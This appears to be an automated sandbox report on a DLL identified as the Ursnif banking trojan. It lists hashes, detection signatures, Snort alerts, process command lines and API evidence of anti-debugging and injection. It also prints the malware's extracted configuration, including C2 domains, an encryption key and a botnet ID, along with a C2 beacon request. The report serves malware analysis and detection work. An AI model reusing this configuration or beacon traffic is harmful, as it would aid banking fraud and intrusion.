Windows Analysis Report 5.dll

Overview

General Information

Sample Name: 5.dll
Analysis ID: 445164
MD5: fceb6a51be4205d11be1491f6e263cae
SHA1: 0abb60d37fac49912172c5385ff58e049520eb53
SHA256: c521dd937ce9b2e8bda2fa915bae5b5be0e150a8b82e3b2bfb1cdbc60a8326c4
Tags: dll

Detection

Ursnif
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Machine Learning detection for sample
Writes or reads registry keys via WMI
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Found malware configuration
Source: 00000006.00000003.368989675.0000000000900000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "ovNAU+HRorLZmwnDvbYFDY7UA+FTIAnF2uJSQd0M+N3ep6CVEhoDrEXACstP09QHK7cBl9nMAaFI1as0K4aXOQKngdScIQbDa3MQ98Ce9MYRMvxGUI05fSIRRFzMYffOXQr97vVUUUPjsYgfkDWS2eKPxSe5dz/pF0mjA0T8ibOLzHmVMs4vVv+nwVAw0xpD", "c2_domain": ["outlook.com", "auredosite.club", "vuredosite.club"], "botnet": "8877", "server": "12", "serpent_key": "30218409ILPAJDUR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}
Multi AV Scanner detection for submitted file
Source: 5.dll Virustotal: Detection: 22%
Machine Learning detection for sample
Source: 5.dll Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files
Source: 5.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: 5.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\393_Molecule\skin\depend\supply\Thick\Drive.pdb source: loaddll32.exe, rundll32.exe

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49721 -> 40.97.116.82:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49721 -> 40.97.116.82:80
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 52.97.144.2 52.97.144.2
Source: Joe Sandbox View IP Address: 40.97.116.82 40.97.116.82
Source: global traffic HTTP traffic detected:
    GET /grower/b1FUosZSinX/D_2FTo28i4eES3/o1nX6HvoNr7JCqEB2TBDy/3reac2cOKkFxPa3C/uHqcEARrcPcZDk3/M6E_2BTZS_2BVaLqj4/34AYxwikF/REm_2FMb1QNTSjBFb_2F/tvRFv4olV4RM6PFjWcs/Yxi4zCvrQiijB3JFDfkmao/_2Ff4LrwOirbu/dGY1O2o_/2BPYCJyNgelsd4Jc6x2/N.grow HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: outlook.com
    Connection: Keep-Alive
Source: unknown DNS traffic detected: queries for: outlook.com
Source: ~DF3A99C7AD2702480D.TMP.24.dr, {BD6AF35E-DF4A-11EB-90E5-ECF4BB570DC9}.dat.24.dr String found in binary or memory: https://outlook.office365.com/grower/GwIQZ7VTU_2B0dEDGXi3usO/98Jy_2Fhjs/9ADdwnOA_2BxxHdxk/bJ6tUkE3rK
Source: ~DFBADD8EC8FEBD51BA.TMP.24.dr, {BD6AF35C-DF4A-11EB-90E5-ECF4BB570DC9}.dat.24.dr String found in binary or memory: https://outlook.office365.com/grower/b1FUosZSinX/D_2FTo28i4eES3/o1nX6HvoNr7JCqEB2TBDy/3reac2cOKkFxPa
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.451946137.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452051043.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.496928044.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445570350.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452023874.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452000205.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445487547.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445636875.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445602533.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445524931.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451869538.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452038744.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.498068878.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445456909.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451977445.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451921011.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445424230.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445650161.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 452, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 2248, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDC1A44 NtMapViewOfSection, 0_2_6DDC1A44
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDC1996 GetProcAddress,NtCreateSection,memset, 0_2_6DDC1996
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDC23A5 NtQueryVirtualMemory, 0_2_6DDC23A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02A75A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_02A75A27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02A7B1A5 NtQueryVirtualMemory, 3_2_02A7B1A5
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDC2184 0_2_6DDC2184
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDE17B0 0_2_6DDE17B0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDF05E5 0_2_6DDF05E5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDF0DB8 0_2_6DDF0DB8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDFBE61 0_2_6DDFBE61
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDF4E00 0_2_6DDF4E00
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DE009C8 0_2_6DE009C8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDF88B7 0_2_6DDF88B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02A7888E 3_2_02A7888E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02A73EE1 3_2_02A73EE1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02A7AF80 3_2_02A7AF80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DDE17B0 3_2_6DDE17B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DDF05E5 3_2_6DDF05E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DDF0DB8 3_2_6DDF0DB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DDFBE61 3_2_6DDFBE61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DDF4E00 3_2_6DDF4E00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DE009C8 3_2_6DE009C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DDF88B7 3_2_6DDF88B7
Found potential string decryption / allocating functions
Source: C:\Windows\System32\loaddll32.exe Code function: String function: 6DDF3290 appears 39 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6DDF3290 appears 39 times
Uses 32bit PE files
Source: 5.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: classification engine Classification label: mal84.troj.winDLL@18/7@6/5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02A7A65C CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 3_2_02A7A65C
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{BD6AF35A-DF4A-11EB-90E5-ECF4BB570DC9}.dat
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF48F8DB99852E5824.TMP
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,Clockcondition
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\5.dll'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\5.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,Clockcondition
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\5.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,Dogwhen
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,Sing
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5.dll,Wholegray
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1900 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1900 CREDAT:17418 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: 5.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\393_Molecule\skin\depend\supply\Thick\Drive.pdb source: loaddll32.exe, rundll32.exe

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDC1BAC LoadLibraryA,GetProcAddress, 0_2_6DDC1BAC
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDC2173 push ecx; ret 0_2_6DDC2183
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDC2120 push ecx; ret 0_2_6DDC2129
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDEDE07 push ecx; ret 0_2_6DDEDE1A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDF32D5 push ecx; ret 0_2_6DDF32E8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DE1C347 push eax; ret 0_2_6DE1C3B1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DE1C400 push eax; ret 0_2_6DE1C3B1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02A7E0C7 push cs; ret 3_2_02A7E0C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02A7E458 push ds; retf 3_2_02A7E47A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02A7ABC0 push ecx; ret 3_2_02A7ABC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02A7E163 push edx; iretd 3_2_02A7E164
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02A7AF6F push ecx; ret 3_2_02A7AF7F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DDEDE07 push ecx; ret 3_2_6DDEDE1A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DDF32D5 push ecx; ret 3_2_6DDF32E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DE1C400 push eax; ret 3_2_6DE1C3B1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DE1C347 push eax; ret 3_2_6DE1C3B1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\loaddll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDFAFAC RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer, 0_2_6DDFAFAC
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDFAFAC RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer, 0_2_6DDFAFAC
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDC1BAC LoadLibraryA,GetProcAddress, 0_2_6DDC1BAC
Contains functionality to read the PEB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DE1E2D8 mov eax, dword ptr fs:[00000030h] 0_2_6DE1E2D8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DE1E207 mov eax, dword ptr fs:[00000030h] 0_2_6DE1E207
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DE1DE0E push dword ptr fs:[00000030h] 0_2_6DE1DE0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DE1E2D8 mov eax, dword ptr fs:[00000030h] 3_2_6DE1E2D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DE1E207 mov eax, dword ptr fs:[00000030h] 3_2_6DE1E207
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DE1DE0E push dword ptr fs:[00000030h] 3_2_6DE1DE0E
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDF3484 GetProcessHeap, 0_2_6DDF3484
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDEFEBA SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6DDEFEBA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6DDEFEBA SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6DDEFEBA

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\5.dll',#1
Source: loaddll32.exe, 00000000.00000002.496085670.0000000001330000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.497582493.0000000002E20000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.496085670.0000000001330000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.497582493.0000000002E20000.00000002.00000001.sdmp Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.496085670.0000000001330000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.497582493.0000000002E20000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: loaddll32.exe, 00000000.00000002.496085670.0000000001330000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.497582493.0000000002E20000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: loaddll32.exe, 00000000.00000002.496085670.0000000001330000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.497582493.0000000002E20000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02A79135 cpuid 3_2_02A79135
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\loaddll32.exe Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW, 0_2_6DDFEC14
Source: C:\Windows\System32\loaddll32.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson, 0_2_6DDF2C5A
Source: C:\Windows\System32\loaddll32.exe Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s, 0_2_6DDFF468
Source: C:\Windows\System32\loaddll32.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 0_2_6DDFEF45
Source: C:\Windows\System32\loaddll32.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 0_2_6DDFEEC8
Source: C:\Windows\System32\loaddll32.exe Code function: EnumSystemLocalesW, 0_2_6DDFEE88
Source: C:\Windows\System32\loaddll32.exe Code function: EnumSystemLocalesW, 0_2_6DDF29A0
Source: C:\Windows\System32\loaddll32.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free, 0_2_6DDEE036
Source: C:\Windows\System32\loaddll32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 0_2_6DDFAB64
Source: C:\Windows\System32\loaddll32.exe Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_6DDFF2E7
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoW, 0_2_6DDF2A26
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson, 3_2_6DDF2C5A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW, 3_2_6DDFEC14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 3_2_6DDFD10F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s, 3_2_6DDFF468
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage, 3_2_6DDFEFC8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 3_2_6DDFEF45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 3_2_6DDFEEC8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 3_2_6DDFEE88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage, 3_2_6DDFF1BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 3_2_6DDF29A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free, 3_2_6DDEE036
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,_GetPrimaryLen, 3_2_6DDFF394
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 3_2_6DDFAB64
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free, 3_2_6DDFCB0D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP, 3_2_6DDFF2E7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 3_2_6DDF2A26
